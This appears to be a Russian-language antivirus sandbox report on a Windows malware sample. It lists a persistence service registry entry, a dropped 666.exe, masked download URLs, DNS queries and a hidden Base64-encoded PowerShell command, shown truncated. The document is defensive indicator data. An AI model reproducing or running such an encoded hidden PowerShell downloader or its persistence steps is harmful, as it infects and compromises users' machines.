Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\trnsnon] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\trnsnon] 'ImagePath' = '"<SYSTEM32>\trnsnon.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAGgAYwBoAGEAdQB3AGcAYQBnAD0AJwBHAGkAZAB3AHcAagB3AGIAcwBtACcAOwAkAE0AeABlAHAAdgBtAG0AdQBvAHAAZgBvACAAPQAgACcANgA2ADYAJwA7ACQATAB3AGkAdwBzAHAAcwBwAHIAdABzAHIAPQAnAE0AdQBmAHcAeAB...
- %HOMEPATH%\666.exe
- %HOMEPATH%\666.exe в <SYSTEM32>\trnsnon.exe
- http://st####tphysio.ca/wp-content/zaq9x-xii-47/
- http://15#.#83.25.24/dlXidjrh38o
- DNS ASK co###print.net
- DNS ASK st####tphysio.ca
- '%HOMEPATH%\666.exe'
- '<SYSTEM32>\trnsnon.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAGgAYwBoAGEAdQB3AGcAYQBnAD0AJwBHAGkAZAB3AHcAagB3AGIAcwBtACcAOwAkAE0AeABlAHAAdgBtAG0AdQBvAHAAZgBvACAAPQAgACcANgA2ADYAJwA7ACQATAB3AGkAdwBzAHAAcwBwAHIAdABzAHIAPQAnAE0AdQBmAHcAeAB...' (со скрытым окном)